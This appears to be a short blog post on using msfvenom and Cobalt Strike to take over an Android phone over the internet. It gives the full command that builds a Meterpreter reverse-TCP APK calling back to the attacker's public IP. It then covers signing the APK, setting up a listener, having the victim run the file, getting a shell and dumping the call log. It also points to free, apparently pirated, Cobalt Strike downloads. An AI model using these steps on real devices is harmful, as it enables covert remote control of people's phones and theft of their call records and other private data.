Hacking Android Using Cobaltstrike Public IP

Introduction Cobaltstrike

Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers. This is not compliance testing.

Reconnaissance

Cobalt Strike's system profiler discovers which client-side applications your target uses, with version information.

Attack Packages

Use Cobalt Strike to host a web drive-by attack or transform an innocent file into a trojan horse.
 And many more. you can visit https://www.cobaltstrike.com/ for full information about cobaltstrike.
and now i can open discussion about penetration testing android using cobaltstrike with outside network or external network.

download signapk
Download Free Cobaltstrike Zippyshare 
Download Free Cobaltstrike 4Shared
Download Free Cobaltstrike Google Drive

open your browser for look you public ip
#msfvenow -p android/meterpreter/reverse_tcp lhost="your public ip" lport=4455 R >/root/Desktop/tes.apk
ekstrack signapk.zip
sign in apk file
#java -jar signapk.jar testkey.x509.pem testkey.pk8 tes.apk finish.apk

open cobaltstrike
search android
and choose reverse_tcp
use lhost = your local ip
use lport = 4455
and launch
view > job
run finish.apk on fictim machine
meterpreter > interact > meterpreter shell
good job. you have access on android victim.
sysinfo
forr see log call android victim you can try it
dump_calllog


ok finish.
attention ; if you will penetration testing using external ip, you need sett open port fordwarding on your router.

download signapk
Download Free Cobaltstrike Zippyshare 
Download Free Cobaltstrike 4Shared
Download Free Cobaltstrike Google Drive






Related Posts:

0 Response to "Hacking Android Using Cobaltstrike Public IP"

Post a Comment